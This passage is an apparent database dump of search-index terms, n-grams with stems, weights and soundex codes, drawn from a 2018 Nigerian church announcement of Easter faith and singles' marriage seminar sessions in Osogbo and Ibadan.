(318489, '2018 between', '2018 between', 0, 1, 1.4, 'B350', 1, '*'),
(318490, '2018 between 8am-12noon', '2018 between 8am-12noon', 0, 1, 1.7667, 'B350', 1, '*'),
(318491, '2018 there', '2018 there', 0, 1, 1.3333, 'T600', 1, '*'),
(318492, '2018 there will', '2018 there will', 0, 1, 1.5, 'T640', 1, '*'),
(318493, '2124', '2124', 0, 0, 0.4, '', 1, '*'),
(318494, '2124 you', '2124 you', 0, 1, 1.2667, 'Y000', 1, '*'),
(318495, '2124 you can', '2124 you can', 0, 1, 1.4, 'Y250', 1, '*'),
(318496, '2153', '2153', 0, 0, 0.4, '', 1, '*'),
(318497, '2153 +234', '2153 +234', 0, 1, 1.3, '', 1, '*'),
(318498, '2153 +234 803', '2153 +234 803', 0, 1, 1.4333, '', 1, '*'),
(318499, '29.03.2018', '29.03.2018', 0, 0, 1, '', 1, '*'),
(318500, '29.03.2018 first', '29.03.2018 first', 0, 1, 1.5333, 'F623', 1, '*'),
(318501, '29.03.2018 first session', '29.03.2018 first session', 0, 1, 1.8, 'F62325', 1, '*'),
(318502, '29th', '29th', 0, 0, 0.2667, 'T000', 1, '*'),
(318503, '29th march', '29th march', 0, 1, 1.3333, 'T562', 1, '*'),
(318504, '29th march 1st', '29th march 1st', 0, 1, 1.4667, 'T5623', 1, '*'),
(318505, '2pm', '2pm', 0, 0, 0.2, 'P500', 1, '*'),
(318506, '2pm third', '2pm third', 0, 1, 1.3, 'P5363', 1, '*'),
(318507, '2pm third session', '2pm third session', 0, 1, 1.5667, 'P536325', 1, '*'),
(318508, '30.03.2018', '30.03.2018', 0, 0, 1, '', 1, '*'),
(318509, '30.03.2018 second', '30.03.2018 second', 0, 1, 1.5667, 'S530', 1, '*'),
(318510, '30.03.2018 second session', '30.03.2018 second session', 0, 1, 1.8333, 'S5325', 1, '*'),
(318511, '31.03.2018', '31.03.2018', 0, 0, 1, '', 1, '*'),
(318512, '31.03.2018 fourth', '31.03.2018 fourth', 0, 1, 1.5667, 'F630', 1, '*'),
(318513, '31.03.2018 fourth session', '31.03.2018 fourth session', 0, 1, 1.8333, 'F6325', 1, '*'),
(318514, '31st', '31st', 0, 0, 0.2667, 'S300', 1, '*'),
(318515, '31st of', '31st of', 0, 1, 1.2333, 'S310', 1, '*'),
(318516, '31st of march', '31st of march', 0, 1, 1.4333, 'S31562', 1, '*'),
(318517, '4 gbongan', '4 gbongan', 0, 1, 1.3, 'G1525', 1, '*'),
(318518, '4 gbongan osogbo', '4 gbongan osogbo', 0, 1, 1.5333, 'G152521', 1, '*'),
(318519, '59', '59', 0, 0, 0.2, '', 1, '*'),
(318520, '59 2018', '59 2018', 0, 1, 1.2333, '', 1, '*'),
(318521, '59 2018 annual', '59 2018 annual', 0, 1, 1.4667, 'A540', 1, '*'),
(318522, '5pm', '5pm', 0, 0, 0.2, 'P500', 1, '*'),
(318523, '5pm 9pm', '5pm 9pm', 0, 1, 1.2333, 'P515', 1, '*'),
(318524, '5pm 9pm friday', '5pm 9pm friday', 0, 1, 1.4667, 'P515163', 1, '*'),
(318525, '5pm 9pm saturday', '5pm 9pm saturday', 0, 1, 1.5333, 'P5152363', 1, '*'),
(318526, '5pm 9pm sunday', '5pm 9pm sunday', 0, 1, 1.4667, 'P515253', 1, '*'),
(318527, '725', '725', 0, 0, 0.3, '', 1, '*'),
(318528, '725 2124', '725 2124', 0, 1, 1.2667, '', 1, '*'),
(318529, '725 2124 you', '725 2124 you', 0, 1, 1.4, 'Y000', 1, '*'),
(318530, '803', '803', 0, 0, 0.3, '', 1, '*'),
(318531, '803 725', '803 725', 0, 1, 1.2333, '', 1, '*'),
(318532, '803 725 2124', '803 725 2124', 0, 1, 1.4, '', 1, '*'),
(318533, '803 849', '803 849', 0, 1, 1.2333, '', 1, '*'),
(318534, '803 849 2153', '803 849 2153', 0, 1, 1.4, '', 1, '*'),
(318535, '849', '849', 0, 0, 0.3, '', 1, '*'),
(318536, '849 2153', '849 2153', 0, 1, 1.2667, '', 1, '*'),
(318537, '849 2153 +234', '849 2153 +234', 0, 1, 1.4333, '', 1, '*'),
(318538, '8am', '8am', 0, 0, 0.2, 'A500', 1, '*'),
(318539, '8am 12noon', '8am 12noon', 0, 1, 1.3333, 'A500', 1, '*'),
(318540, '8am 12noon fifth', '8am 12noon fifth', 0, 1, 1.5333, 'A513', 1, '*'),
(318541, '8am 12noon venue', '8am 12noon venue', 0, 1, 1.5333, 'A515', 1, '*'),
(318542, '8am 2pm', '8am 2pm', 0, 1, 1.2333, 'A515', 1, '*'),
(318543, '8am 2pm third', '8am 2pm third', 0, 1, 1.4333, 'A515363', 1, '*'),
(318544, '8am-12noon', '8am-12noon', 0, 0, 0.6667, 'A500', 1, '*'),
(318545, '8am-12noon for', '8am-12noon for', 0, 1, 1.4667, 'A516', 1, '*'),
(318546, '8am-12noon for enquiries', '8am-12noon for enquiries', 0, 1, 1.8, 'A5165262', 1, '*'),
(318547, '9pm', '9pm', 0, 0, 0.2, 'P500', 1, '*'),
(318548, '9pm friday', '9pm friday', 0, 1, 1.3333, 'P5163', 1, '*'),
(318549, '9pm friday 30.03.2018', '9pm friday 30.03.2018', 0, 1, 1.7, 'P5163', 1, '*'),
(318550, '9pm saturday', '9pm saturday', 0, 1, 1.4, 'P52363', 1, '*'),
(318551, '9pm saturday 31.03.2018', '9pm saturday 31.03.2018', 0, 1, 1.7667, 'P52363', 1, '*'),
(318552, '9pm sunday', '9pm sunday', 0, 1, 1.3333, 'P5253', 1, '*'),
(318553, '9pm sunday 01.04.2018', '9pm sunday 01.04.2018', 0, 1, 1.7, 'P5253', 1, '*'),
(318554, 'a special', 'a special', 0, 1, 1.3, 'A2124', 1, '*'),
(318555, 'a special marriage', 'a special marriage', 0, 1, 1.6, 'A2124562', 1, '*'),
(318556, 'akinlolu', 'akinlolu', 0, 0, 0.5333, 'A254', 1, '*'),
(318557, 'akinlolu raphael', 'akinlolu raphael', 0, 1, 1.5333, 'A254614', 1, '*'),
(318558, 'akinlolu raphael world', 'akinlolu raphael world', 0, 1, 1.7333, 'A254614643', 1, '*'),
(318559, 'all sessions', 'all sessions', 0, 1, 1.4, 'A4252', 1, '*'),
(318560, 'all sessions online', 'all sessions online', 0, 1, 1.6333, 'A4252545', 1, '*'),
(318561, 'all singles', 'all singles', 0, 1, 1.3667, 'A425242', 1, '*'),
(318562, 'all singles on', 'all singles on', 0, 1, 1.4667, 'A4252425', 1, '*'),
(318563, 'also join', 'also join', 0, 1, 1.3, 'A425', 1, '*'),
(318564, 'also join all', 'also join all', 0, 1, 1.4333, 'A4254', 1, '*'),
(318565, 'and family to', 'and family to', 0, 1, 1.4333, 'A531543', 1, '*'),
(318566, 'annual easter', 'annual easter', 0, 1, 1.4333, 'A54236', 1, '*'),
(318567, 'annual easter faith', 'annual easter faith', 0, 1, 1.6333, 'A5423613', 1, '*'),
(318568, 'april', 'april', 0, 0, 0.3333, 'A164', 1, '*'),
(318569, 'april 2018', 'april 2018', 0, 1, 1.3333, 'A164', 1, '*'),
(318570, 'april 2018 there', 'april 2018 there', 0, 1, 1.5333, 'A16436', 1, '*'),
(318571, 'are ready jesus', 'ar ready jesus', 0, 1, 1.5, 'A632', 1, '*'),
(318572, 'are rev', 'ar rev', 0, 1, 1.2333, 'A610', 1, '*'),
(318573, 'are rev akinlolu', 'ar rev akinlolu', 0, 1, 1.5333, 'A61254', 1, '*'),
(318574, 'be a special', 'be a special', 0, 1, 1.4, 'B2124', 1, '*'),
(318575, 'be six', 'be six', 0, 1, 1.2, 'B200', 1, '*'),
(318576, 'be six powerful', 'be six powerful', 0, 1, 1.5, 'B21614', 1, '*'),
(318577, 'between 8am-12noon', 'between 8am-12noon', 0, 1, 1.6, 'B350', 1, '*'),
(318578, 'between 8am-12noon for', 'between 8am-12noon for', 0, 1, 1.7333, 'B3516', 1, '*'),
(318579, 'bus', 'bu', 0, 0, 0.2, 'B200', 1, '*'),
(318580, 'bus stop', 'bu stop', 0, 1, 1.2667, 'B231', 1, '*'),
(318581, 'bus stop osogbo', 'bu stop osogbo', 0, 1, 1.5, 'B23121', 1, '*'),
(318582, 'call +23407060930809', 'call +23407060930809', 0, 1, 1.6667, 'C400', 1, '*'),
(318583, 'call +23407060930809 +234', 'call +23407060930809 +234', 0, 1, 1.8333, 'C400', 1, '*'),
(318584, 'can also', 'can also', 0, 1, 1.2667, 'C542', 2, '*'),
(318585, 'can also join', 'can also join', 0, 1, 1.4333, 'C5425', 1, '*'),
(318586, 'centre bus', 'centr bus', 0, 1, 1.3333, 'C53612', 1, '*'),
(318587, 'centre bus stop', 'centr bus stop', 0, 1, 1.5, 'C5361231', 1, '*'),
(318588, 'centre headquaters', 'centr headquaters', 0, 1, 1.6, 'C53632362', 1, '*'),
(318589, 'centre headquaters km', 'centr headquaters km', 0, 1, 1.7, 'C536323625', 1, '*'),
(318590, 'charis', 'chari', 0, 0, 0.4, 'C620', 1, '*'),
(318591, 'charis family', 'chari family', 0, 1, 1.4333, 'C62154', 1, '*'),
(318592, 'charis family int\'l', 'chari family int', 0, 1, 1.6333, 'C62154534', 1, '*'),
(318593, 'church ibadan', 'church ibadan', 0, 1, 1.4333, 'C62135', 1, '*'),
(318594, 'church ibadan oyo', 'church ibadan oyo', 0, 1, 1.5667, 'C62135', 1, '*'),
(318595, 'come all', 'come all', 0, 1, 1.2667, 'C540', 1, '*'),
(318596, 'come all things', 'come all things', 0, 1, 1.5, 'C54352', 1, '*'),
(318597, 'coming up', 'come up', 0, 1, 1.3, 'C521', 1, '*'),
(318598, 'coming up 29th', 'come up 29th', 0, 1, 1.4667, 'C5213', 1, '*'),
(318599, 'cordially', 'cordial', 0, 0, 0.6, 'C634', 1, '*'),
(318600, 'cordially invite', 'cordial invite', 0, 1, 1.5333, 'C634513', 1, '*'),
(318601, 'cordially invite you', 'cordial invite you', 0, 1, 1.6667, 'C634513', 1, '*'),
(318602, 'dciradio', 'dciradio', 0, 0, 0.5333, 'D263', 1, '*'),
(318603, 'dciradio org', 'dciradio org', 0, 1, 1.4, 'D26362', 1, '*'),
(318604, 'dciradio org facebook', 'dciradio org facebook', 0, 1, 1.7, 'D263621212', 1, '*'),
(318605, 'dream centre bus', 'dream centre bus', 0, 1, 1.5333, 'D65253612', 1, '*'),
(318606, 'dream centre headquaters', 'dream centre headquaters', 0, 1, 1.8, 'D65253632362', 1, '*'),
(318607, 'edition', 'edit', 0, 0, 0.4667, 'E350', 1, '*'),
(318608, 'edition of', 'edit of', 0, 1, 1.3333, 'E351', 1, '*'),
(318609, 'edition of easter', 'edit of easter', 0, 1, 1.5667, 'E351236', 1, '*'),
(318610, 'enquiries', 'enquiri', 0, 0, 0.6, 'E5262', 1, '*'),
(318611, 'enquiries call', 'enquiri call', 0, 1, 1.4667, 'E52624', 1, '*'),
(318612, 'enquiries call +23407060930809', 'enquiri call +23407060930809', 0, 1, 2, 'E52624', 1, '*'),
(318613, 'expressway', 'expresswai', 0, 0, 0.6667, 'E2162', 1, '*'),
(318614, 'expressway dream', 'expresswai dream', 0, 1, 1.5333, 'E2162365', 1, '*'),
(318615, 'expressway dream centre', 'expresswai dream centre', 0, 1, 1.7667, 'E21623652536', 1, '*'),
(318616, 'facebook', 'facebook', 0, 0, 0.5333, 'F212', 1, '*'),
(318617, 'facebook twitter', 'facebook twitter', 0, 1, 1.5333, 'F21236', 1, '*'),
(318618, 'facebook twitter reverendareogun', 'facebook twitter reverendareogun', 0, 1, 2, 'F212361653625', 1, '*'),
(318619, 'faith seminar coming', 'faith seminar coming', 0, 1, 1.6667, 'F3256252', 1, '*'),
(318620, 'faith seminar thursday', 'faith seminar thursday', 0, 1, 1.7333, 'F32563623', 1, '*'),
(318621, 'family int\'l', 'famili int', 0, 1, 1.4, 'F54534', 1, '*'),
(318622, 'family int\'l church', 'famili int church', 0, 1, 1.6333, 'F54534262', 1, '*'),
(318623, 'family to', 'famili to', 0, 1, 1.3, 'F543', 1, '*'),
(318624, 'family to the', 'famili to the', 0, 1, 1.4333, 'F543', 1, '*'),
(318625, 'fifth', 'fifth', 0, 0, 0.3333, 'F300', 1, '*'),
(318626, 'fifth session', 'fifth session', 0, 1, 1.4333, 'F325', 1, '*'),
(318627, 'fifth session session', 'fifth session session', 0, 1, 1.7, 'F32525', 1, '*'),
(318628, 'first session', 'first session', 0, 1, 1.4333, 'F62325', 1, '*'),
(318629, 'first session 5pm', 'first session 5pm', 0, 1, 1.5667, 'F6232515', 1, '*'),
(318630, 'following media', 'follow media', 0, 1, 1.5, 'F45253', 1, '*'),
(318631, 'following media youtube', 'follow media youtube', 0, 1, 1.7667, 'F452531', 1, '*'),
(318632, 'for all singles', 'for all singles', 0, 1, 1.5, 'F6425242', 1, '*'),
(318633, 'for enquiries', 'for enquiries', 0, 1, 1.4333, 'F65262', 1, '*'),
(318634, 'for enquiries call', 'for enquiries call', 0, 1, 1.6, 'F652624', 1, '*'),
(318635, 'for this edition', 'for this edition', 0, 1, 1.5333, 'F63235', 1, '*'),
(318636, 'fourth', 'fourth', 0, 0, 0.4, 'F630', 1, '*'),
(318637, 'fourth session', 'fourth session', 0, 1, 1.4667, 'F6325', 1, '*'),
(318638, 'fourth session 8am', 'fourth session 8am', 0, 1, 1.6, 'F6325', 1, '*'),
(318639, 'friday', 'fridai', 0, 0, 0.4, 'F630', 1, '*'),
(318640, 'friday 30.03.2018', 'fridai 30.03.2018', 0, 1, 1.5667, 'F630', 1, '*'),
(318641, 'friday 30.03.2018 second', 'fridai 30.03.2018 second', 0, 1, 1.8, 'F63253', 1, '*'),
(318642, 'friends and', 'friend and', 0, 1, 1.3667, 'F653253', 1, '*'),
(318643, 'friends and family', 'friend and family', 0, 1, 1.6, 'F653253154', 1, '*'),
(318644, 'gbongan', 'gbongan', 0, 0, 0.4667, 'G1525', 1, '*'),
(318645, 'gbongan osogbo', 'gbongan osogbo', 0, 1, 1.4667, 'G152521', 1, '*'),
(318646, 'gbongan osogbo expressway', 'gbongan osogbo expressway', 0, 1, 1.8333, 'G1525212162', 1, '*'),
(318647, 'god greetings', 'god greetings', 0, 1, 1.4333, 'G326352', 1, '*'),
(318648, 'god greetings of', 'god greetings of', 0, 1, 1.5333, 'G3263521', 1, '*'),
(318649, 'greetings', 'greet', 0, 0, 0.6, 'G6352', 1, '*'),
(318650, 'greetings of', 'greet of', 0, 1, 1.4, 'G63521', 1, '*'),
(318651, 'greetings of love', 'greet of love', 0, 1, 1.5667, 'G6352141', 1, '*'),
(318652, 'harvest network', 'harvest network', 0, 1, 1.5, 'H61235362', 1, '*'),
(318653, 'harvest network int\'l', 'harvest network int', 0, 1, 1.7, 'H61235362534', 1, '*'),
(318654, 'headquaters', 'headquat', 0, 0, 0.7333, 'H32362', 1, '*'),
(318655, 'headquaters km', 'headquat km', 0, 1, 1.4667, 'H323625', 1, '*'),
(318656, 'headquaters km 4', 'headquat km 4', 0, 1, 1.5333, 'H323625', 1, '*'),
(318657, 'ibadan', 'ibadan', 0, 0, 0.4, 'I135', 1, '*'),
(318658, 'ibadan oyo', 'ibadan oyo', 0, 1, 1.3333, 'I135', 1, '*'),
(318659, 'ibadan oyo state', 'ibadan oyo state', 0, 1, 1.5333, 'I13523', 1, '*'),
(318660, 'int\'l', 'int', 0, 0, 0.3333, 'I534', 1, '*'),
(318661, 'int\'l church', 'int church', 0, 1, 1.4, 'I534262', 1, '*'),
(318662, 'int\'l church ibadan', 'int church ibadan', 0, 1, 1.6333, 'I534262135', 1, '*'),
(318663, 'int\'l ibadan', 'int ibadan', 0, 1, 1.4, 'I534135', 1, '*'),
(318664, 'int\'l ibadan oyo', 'int ibadan oyo', 0, 1, 1.5333, 'I534135', 1, '*'),
(318665, 'invite', 'invit', 0, 0, 0.4, 'I513', 1, '*'),
(318666, 'invite you', 'invit you', 0, 1, 1.3333, 'I513', 1, '*'),
(318667, 'invite you your', 'invit you your', 0, 1, 1.5, 'I5136', 1, '*'),
(318668, 'is lord', 'is lord', 0, 1, 1.2333, 'I2463', 1, '*'),
(318669, 'item 59', 'item 59', 0, 1, 1.2333, 'I350', 1, '*'),
(318670, 'item 59 2018', 'item 59 2018', 0, 1, 1.4, 'I350', 1, '*'),
(318671, 'jayebo', 'jayebo', 0, 0, 0.4, 'J100', 1, '*'),
(318672, 'jayebo charis', 'jayebo charis', 0, 1, 1.4333, 'J1262', 1, '*'),
(318673, 'jayebo charis family', 'jayebo charis family', 0, 1, 1.6667, 'J1262154', 1, '*'),
(318674, 'jesus is lord', 'jesu is lord', 0, 1, 1.4333, 'J463', 1, '*'),
(318675, 'jesus name we', 'jesu name we', 0, 1, 1.4333, 'J500', 1, '*'),
(318676, 'join all', 'join all', 0, 1, 1.2667, 'J540', 1, '*'),
(318677, 'join all sessions', 'join all sessions', 0, 1, 1.5667, 'J54252', 1, '*'),
(318678, 'joining', 'join', 0, 0, 0.4667, 'J520', 1, '*'),
(318679, 'joining us', 'join us', 0, 1, 1.3333, 'J520', 1, '*'),
(318680, 'joining us to', 'join us to', 0, 1, 1.4333, 'J523', 1, '*'),
(318681, 'k2 item 59', 'k2 item 59', 0, 1, 1.3333, 'K350', 1, '*'),
(318682, 'km', 'km', 0, 0, 0.1333, 'K500', 1, '*'),
(318683, 'km 4', 'km 4', 0, 1, 1.1333, 'K500', 1, '*'),
(318684, 'km 4 gbongan', 'km 4 gbongan', 0, 1, 1.4, 'K521525', 1, '*'),
(318685, 'lifeoasisinternationalchurch', 'lifeoasisinternationalchurch', 0, 0, 1, 'L125365354262', 1, '*'),
(318686, 'lifeoasisinternationalchurch org', 'lifeoasisinternationalchurch org', 0, 1, 2, 'L12536535426262', 1, '*'),
(318687, 'lifeoasisinternationalchurch org streaming', 'lifeoasisinternationalchurch org streaming', 0, 1, 2, 'L125365354262623652', 1, '*'),
(318688, 'love in', 'love in', 0, 1, 1.2333, 'L150', 1, '*'),
(318689, 'love in jesus', 'love in jesus', 0, 1, 1.4333, 'L152', 1, '*'),
(318690, 'march', 'march', 0, 0, 0.3333, 'M620', 1, '*'),
(318691, 'march 1st', 'march 1st', 0, 1, 1.3, 'M623', 1, '*'),
(318692, 'march 1st april', 'march 1st april', 0, 1, 1.5, 'M623164', 1, '*'),
(318693, 'march 2018', 'march 2018', 0, 1, 1.3333, 'M620', 1, '*'),
(318694, 'march 2018 between', 'march 2018 between', 0, 1, 1.6, 'M62135', 1, '*'),
(318695, 'marriage seminar', 'marriag seminar', 0, 1, 1.5333, 'M6256', 1, '*'),
(318696, 'marriage seminar for', 'marriag seminar for', 0, 1, 1.6667, 'M625616', 1, '*'),
(318697, 'media', 'media', 0, 0, 0.3333, 'M300', 1, '*'),
(318698, 'media youtube', 'media youtube', 0, 1, 1.4333, 'M310', 1, '*'),
(318699, 'media youtube www', 'media youtube www', 0, 1, 1.5667, 'M310', 1, '*'),
(318700, 'minister are', 'minist are', 0, 1, 1.4, 'M236', 1, '*'),
(318701, 'minister are rev', 'minist are rev', 0, 1, 1.5333, 'M2361', 1, '*'),
(318702, 'name we', 'name we', 0, 1, 1.2333, 'N000', 1, '*'),
(318703, 'name we cordially', 'name we cordially', 0, 1, 1.5667, 'N2634', 1, '*'),
(318704, 'network', 'network', 0, 0, 0.4667, 'N362', 1, '*'),
(318705, 'network int\'l', 'network int', 0, 1, 1.4333, 'N362534', 1, '*'),
(318706, 'network int\'l ibadan', 'network int ibadan', 0, 1, 1.6667, 'N362534135', 1, '*'),
(318707, 'of easter', 'of easter', 0, 1, 1.3, 'O1236', 1, '*'),
(318708, 'of easter faith', 'of easter faith', 0, 1, 1.5, 'O123613', 1, '*'),
(318709, 'of god greetings', 'of god greetings', 0, 1, 1.5333, 'O12326352', 1, '*'),
(318710, 'of love in', 'of love in', 0, 1, 1.3333, 'O1415', 1, '*'),
(318711, 'of march', 'of march', 0, 1, 1.2667, 'O1562', 1, '*'),
(318712, 'of march 2018', 'of march 2018', 0, 1, 1.4333, 'O1562', 1, '*'),
(318713, 'on saturday', 'on saturday', 0, 1, 1.3667, 'O52363', 1, '*'),
(318714, 'on saturday 31st', 'on saturday 31st', 0, 1, 1.5333, 'O5236323', 1, '*'),
(318715, 'online', 'onlin', 0, 0, 0.4, 'O545', 1, '*'),
(318716, 'online via', 'onlin via', 0, 1, 1.3333, 'O5451', 1, '*'),
(318717, 'online via the', 'onlin via the', 0, 1, 1.4667, 'O54513', 1, '*'),
(318718, 'org', 'org', 0, 0, 0.2, 'O620', 1, '*'),
(318719, 'org facebook', 'org facebook', 0, 1, 1.4, 'O621212', 1, '*'),
(318720, 'org facebook twitter', 'org facebook twitter', 0, 1, 1.6667, 'O62121236', 1, '*'),
(318721, 'org streaming', 'org streaming', 0, 1, 1.4333, 'O623652', 1, '*'),
(318722, 'org streaming radio', 'org streaming radio', 0, 1, 1.6333, 'O62365263', 1, '*'),
(318723, 'osogbo', 'osogbo', 0, 0, 0.4, 'O210', 1, '*'),
(318724, 'osogbo expressway', 'osogbo expressway', 0, 1, 1.5667, 'O212162', 1, '*'),
(318725, 'osogbo expressway dream', 'osogbo expressway dream', 0, 1, 1.7667, 'O212162365', 1, '*'),
(318726, 'osogbo osun', 'osogbo osun', 0, 1, 1.3667, 'O2125', 1, '*'),
(318727, 'osogbo osun state', 'osogbo osun state', 0, 1, 1.5667, 'O212523', 1, '*'),
(318728, 'osun state joining', 'osun state joining', 0, 1, 1.6, 'O2523252', 1, '*'),
(318729, 'oyo', 'oyo', 0, 0, 0.2, 'O000', 1, '*'),
(318730, 'oyo state', 'oyo state', 0, 1, 1.3, 'O230', 1, '*'),
(318731, 'oyo state pastor', 'oyo state pastor', 0, 1, 1.5333, 'O231236', 1, '*'),
(318732, 'oyo state there', 'oyo state there', 0, 1, 1.5, 'O236', 1, '*'),
(318733, 'pastor tunde', 'pastor tunde', 0, 1, 1.4, 'P236353', 1, '*'),
(318734, 'pastor tunde jayebo', 'pastor tunde jayebo', 0, 1, 1.6333, 'P23635321', 1, '*'),
(318735, 'powerful sessions', 'power sessions', 0, 1, 1.5667, 'P614252', 1, '*'),
(318736, 'powerful sessions for', 'power sessions for', 0, 1, 1.7, 'P61425216', 1, '*'),
(318737, 'radio', 'radio', 0, 0, 0.3333, 'R300', 1, '*'),
(318738, 'radio www', 'radio www', 0, 1, 1.3, 'R300', 1, '*'),
(318739, 'radio www dciradio', 'radio www dciradio', 0, 1, 1.6, 'R3263', 1, '*'),
(318740, 'raphael', 'raphael', 0, 0, 0.4667, 'R140', 1, '*'),
(318741, 'raphael world', 'raphael world', 0, 1, 1.4333, 'R14643', 1, '*'),
(318742, 'raphael world harvest', 'raphael world harvest', 0, 1, 1.7, 'R146436123', 1, '*'),
(318743, 'ready jesus', 'readi jesus', 0, 1, 1.3667, 'R320', 1, '*'),
(318744, 'ready jesus is', 'readi jesus is', 0, 1, 1.4667, 'R320', 1, '*'),
(318745, 'rev akinlolu', 'rev akinlolu', 0, 1, 1.4, 'R1254', 1, '*'),
(318746, 'rev akinlolu raphael', 'rev akinlolu raphael', 0, 1, 1.6667, 'R1254614', 1, '*'),
(318747, 'reverendareogun', 'reverendareogun', 0, 0, 1, 'R1653625', 1, '*'),
(318748, 'reverendareogun come', 'reverendareogun come', 0, 1, 1.6667, 'R165362525', 1, '*'),
(318749, 'reverendareogun come all', 'reverendareogun come all', 0, 1, 1.8, 'R1653625254', 1, '*'),
(318750, 'saturday', 'saturdai', 0, 0, 0.5333, 'S363', 1, '*'),
(318751, 'saturday 31.03.2018', 'saturdai 31.03.2018', 0, 1, 1.6333, 'S363', 1, '*'),
(318752, 'saturday 31.03.2018 fourth', 'saturdai 31.03.2018 fourth', 0, 1, 1.8667, 'S363163', 1, '*'),
(318753, 'saturday 31st', 'saturdai 31st', 0, 1, 1.4333, 'S36323', 1, '*'),
(318754, 'saturday 31st of', 'saturdai 31st of', 0, 1, 1.5333, 'S363231', 1, '*'),
(318755, 'second session', 'second session', 0, 1, 1.4667, 'S5325', 1, '*'),
(318756, 'second session 8am', 'second session 8am', 0, 1, 1.6, 'S5325', 1, '*'),
(318757, 'seminar coming', 'seminar coming', 0, 1, 1.4667, 'S56252', 1, '*'),
(318758, 'seminar coming up', 'seminar coming up', 0, 1, 1.5667, 'S562521', 1, '*'),
(318759, 'seminar for', 'seminar for', 0, 1, 1.3667, 'S5616', 1, '*'),
(318760, 'seminar for all', 'seminar for all', 0, 1, 1.5, 'S56164', 1, '*'),
(318761, 'seminar thursday', 'seminar thursday', 0, 1, 1.5333, 'S563623', 1, '*'),
(318762, 'seminar thursday 29.03.2018', 'seminar thursday 29.03.2018', 0, 1, 1.9, 'S563623', 1, '*'),
(318763, 'session', 'session', 0, 0, 0.4667, 'S500', 1, '*'),
(318764, 'session 5pm', 'session 5pm', 0, 1, 1.3667, 'S515', 1, '*'),
(318765, 'session 5pm 9pm', 'session 5pm 9pm', 0, 1, 1.5, 'S51515', 1, '*'),
(318766, 'session 8am', 'session 8am', 0, 1, 1.3667, 'S500', 1, '*'),
(318767, 'session 8am 12noon', 'session 8am 12noon', 0, 1, 1.6, 'S500', 1, '*'),
(318768, 'session 8am 2pm', 'session 8am 2pm', 0, 1, 1.5, 'S515', 1, '*'),
(318769, 'session session', 'session session', 0, 1, 1.5, 'S525', 1, '*'),
(318770, 'session session 5pm', 'session session 5pm', 0, 1, 1.6333, 'S52515', 1, '*'),
(318771, 'sessions', 'session', 0, 0, 0.5333, 'S520', 1, '*'),
(318772, 'sessions for', 'session for', 0, 1, 1.4, 'S5216', 1, '*'),
(318773, 'sessions for this', 'session for this', 0, 1, 1.5667, 'S521632', 1, '*'),
(318774, 'sessions online', 'session online', 0, 1, 1.5, 'S52545', 1, '*'),
(318775, 'sessions online via', 'session online via', 0, 1, 1.6333, 'S525451', 1, '*'),
(318776, 'singles', 'singl', 0, 0, 0.4667, 'S5242', 1, '*'),
(318777, 'singles on', 'singl on', 0, 1, 1.3333, 'S52425', 1, '*'),
(318778, 'singles on saturday', 'singl on saturday', 0, 1, 1.6333, 'S524252363', 1, '*'),
(318779, 'six powerful', 'six powerful', 0, 1, 1.4, 'S1614', 1, '*'),
(318780, 'six powerful sessions', 'six powerful sessions', 0, 1, 1.7, 'S1614252', 1, '*'),
(318781, 'sixth', 'sixth', 0, 0, 0.3333, 'S300', 1, '*'),
(318782, 'sixth session', 'sixth session', 0, 1, 1.4333, 'S325', 1, '*'),
(318783, 'sixth session 8am', 'sixth session 8am', 0, 1, 1.5667, 'S325', 1, '*'),
(318784, 'special marriage', 'special marriage', 0, 1, 1.5333, 'S124562', 1, '*'),
(318785, 'special marriage seminar', 'special marriage seminar', 0, 1, 1.8, 'S12456256', 1, '*'),
(318786, 'state joining', 'state joining', 0, 1, 1.4333, 'S3252', 1, '*'),
(318787, 'state joining us', 'state joining us', 0, 1, 1.5333, 'S3252', 1, '*'),
(318788, 'state pastor', 'state pastor', 0, 1, 1.4, 'S31236', 1, '*'),
(318789, 'state pastor tunde', 'state pastor tunde', 0, 1, 1.6, 'S31236353', 1, '*'),
(318790, 'state there', 'state there', 0, 1, 1.3667, 'S360', 1, '*'),
(318791, 'state there will', 'state there will', 0, 1, 1.5333, 'S364', 1, '*'),
(318792, 'stop osogbo', 'stop osogbo', 0, 1, 1.3667, 'S3121', 1, '*'),
(318793, 'stop osogbo osun', 'stop osogbo osun', 0, 1, 1.5333, 'S312125', 1, '*'),
(318794, 'streaming', 'stream', 0, 0, 0.6, 'S3652', 1, '*'),
(318795, 'streaming radio', 'stream radio', 0, 1, 1.5, 'S365263', 1, '*'),
(318796, 'streaming radio www', 'stream radio www', 0, 1, 1.6333, 'S365263', 1, '*'),
(318797, 'sunday 01.04.2018', 'sundai 01.04.2018', 0, 1, 1.5667, 'S530', 1, '*'),
(318798, 'sunday 01.04.2018 sixth', 'sundai 01.04.2018 sixth', 0, 1, 1.7667, 'S5323', 1, '*'),
(318799, 'the 2018', 'the 2018', 0, 1, 1.2667, 'T000', 1, '*'),
(318800, 'the 2018 annual', 'the 2018 annual', 0, 1, 1.5, 'T540', 1, '*'),
(318801, 'the following media', 'the following media', 0, 1, 1.6333, 'T145253', 1, '*'),
(318802, 'things are ready', 'thing are ready', 0, 1, 1.5333, 'T5263', 1, '*'),
(318803, 'third', 'third', 0, 0, 0.3333, 'T630', 1, '*'),
(318804, 'third session', 'third session', 0, 1, 1.4333, 'T6325', 1, '*'),
(318805, 'third session 5pm', 'third session 5pm', 0, 1, 1.5667, 'T632515', 1, '*'),
(318806, 'this edition', 'thi edition', 0, 1, 1.4, 'T235', 1, '*'),
(318807, 'this edition of', 'thi edition of', 0, 1, 1.5, 'T2351', 1, '*'),
(318808, 'thursday', 'thursdai', 0, 0, 0.5333, 'T623', 1, '*'),
(318809, 'thursday 29.03.2018', 'thursdai 29.03.2018', 0, 1, 1.6333, 'T623', 1, '*'),
(318810, 'thursday 29.03.2018 first', 'thursdai 29.03.2018 first', 0, 1, 1.8333, 'T6231623', 1, '*'),
(318811, 'to minister', 'to minister', 0, 1, 1.3667, 'T5236', 1, '*'),
(318812, 'to minister are', 'to minister are', 0, 1, 1.5, 'T5236', 1, '*'),
(318813, 'to the 2018', 'to the 2018', 0, 1, 1.3667, 'T000', 1, '*'),
(318814, 'tunde', 'tund', 0, 0, 0.3333, 'T530', 1, '*'),
(318815, 'tunde jayebo', 'tund jayebo', 0, 1, 1.4, 'T5321', 1, '*'),
(318816, 'tunde jayebo charis', 'tund jayebo charis', 0, 1, 1.6333, 'T5321262', 1, '*'),
(318817, 'twitter reverendareogun', 'twitter reverendareogun', 0, 1, 1.7667, 'T61653625', 1, '*'),
(318818, 'twitter reverendareogun come', 'twitter reverendareogun come', 0, 1, 1.9333, 'T6165362525', 1, '*'),
